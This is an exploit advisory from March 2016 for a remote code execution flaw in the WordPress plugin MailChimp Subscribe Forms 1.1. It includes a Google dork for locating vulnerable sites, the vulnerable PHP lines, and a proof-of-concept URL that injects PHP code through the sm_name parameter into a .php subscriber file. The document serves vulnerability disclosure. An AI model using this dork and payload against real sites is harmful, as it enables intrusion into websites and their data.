WordPress MailChimp Subscribe Forms 1.1 Remote Code Execution
Posted on 24 March 2016
# Exploit Title: Wordpress Plugin MailChimp Subscribe Forms - Remote Code Execution # Date: 23-03-2016 # Exploit Author: CrashBandicot # Google Dork : inurl:/wp-content/plugins/mailchimp-subscribe-sm/ # Vendor Homepage: https://fr.wordpress.org/plugins/mailchimp-subscribe-sm/ # Tested on: MSWin32 # Version: 1.1 # Vulnerability in GET # Put your mail for subscribe and send but add in URL the Parameter sm_name with PHP Code # Vulnerable Files : mailchimp-subscribe-sm/inc/store-address.php 18. if(!preg_match("/^[_a-z0-9-]+(.[_a-z0-9-]+)*@[a-z0-9-]+(.[a-z0-9-]+)*$/i", $_GET['sm_email'])) { ... 23. $smf_data = '* Name : '.$_GET['sm_name']; 24. $smf_data .= ' Email : '.$_GET['sm_email'].' , '. PHP_EOL; ... 36. $file = "sm_subscribers_list.php"; ... 39. $fp = fopen($file, "a"); 40. fwrite($fp, $smf_data); ... 42. fclose($fp); # PoC : localhost/subscribe/?sm_email=0day@0day.com&sm_name=<?php phpinfo(); ?>&submit=subscribe # Result in file sm_subscribers_list.php # PicS : http://i.imgur.com/HHtuycC.png